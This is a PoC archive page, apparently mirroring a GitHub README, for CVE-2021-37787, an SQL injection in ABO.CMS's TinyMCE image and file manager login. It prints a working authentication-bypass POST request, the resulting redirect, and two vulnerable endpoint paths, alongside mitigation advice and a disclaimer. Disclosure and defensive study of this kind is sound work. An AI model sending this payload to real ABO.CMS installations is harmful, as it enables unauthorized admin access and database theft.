Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2021-37787 PoC — ABO.CMS 安全漏洞

Source
https://github.com/vasykor/CVE-2021-37787
Associated Vulnerability
Title:ABO.CMS 安全漏洞 (CVE-2021-37787)
Description:The unprivileged administrative interface in ABO.CMS version 5.8 through v.5.9.3 is affected by a SQL Injection vulnerability via a HTTP POST request to the TinyMCE module
Description
CVE-2021-37787
Readme
��# CVE-2021-37787: SQL Injection in ABOCMS via TinyMCE Module



## Vulnerability Details



- **CVE ID**: CVE-2021-37787

- **Product**: ABOCMS

- **Affected Version(s)**: 5.8.x, d"5.9.3

- **Vulnerability Type**: SQL Injection

- **CVSS Score**: 9.8



### Description



A critical SQL injection vulnerability exists in ABOCMS within the TinyMCE module. The vulnerability arises due to insufficient input sanitization in the TinyMCE module's interaction with the database, allowing an attacker to inject malicious SQL queries. This can lead to unauthorized data access, modification, or even full compromise of the underlying database.



The vulnerable endpoint is located in the TinyMCE module's processing of user-supplied input. An attacker can exploit this flaw to execute arbitrary SQL commands.



### Impact



- Aunthentication bypass.

- Extraction of sensitive data.

- Modification or deletion of database records.

- Potential remote code execution, depending on the database configuration.



## Proof of Concept (PoC)



## POST Request



```

POST /js/admin/tiny_mce/plugins/imagemanager/login_session_auth.php HTTP/1.1

Host: <yourdomain.name>

Content-Type: application/x-www-form-urlencoded



return_url=%2Fjs%2Fadmin%2Ftiny_mce%2Fplugins%2Fimagemanager%2Findex.php%3Ftype%3Dim%26page%3Dindex.html&login=1%27+OR+%271%27%3D1+%23&password=1&submit_button=Login

```



## Response



```

HTTP/1.1 302 Found

Server: nginx-reuseport/1.21.1

Date: <date>

Content-Type: text/html; charset=utf-8

Content-Length: 0

Connection: keep-alive

Keep-Alive: timeout=30

X-Powered-By: PHP/5.6.40

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

A-Powered-By: ABO.CMS 5.9.3 (fe01ce2a7fbac8fafaed7c982a04e229)

location: /js/admin/tiny_mce/plugins/imagemanager/index.php?type=im&page=index.html

```



### Vulnerable Endpoint



The vulnerability can be triggered via the following endpoint:



/js/admin/tiny_mce/plugins/imagemanager/login_session_auth.php

/js/admin/tiny_mce/plugins/filemanager/login_session_auth.php



## Mitigation



- **For Users**:

  - Upgrade to the latest version of ABOCMS.

  - Disable the TinyMCE module if it s not essential.



- **For Developers**:

  - Use prepared statements or parameterized queries to interact with the database.

  - Update the TinyMCE module to the latest secure version.

  - Implement proper input validation to filter out malicious payloads.



## Disclaimer



This PoC is provided for educational and security research purposes only. Do not use this code to harm systems or networks without explicit permission from the owner. The author is not responsible for any misuse or damage caused by this PoC.
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →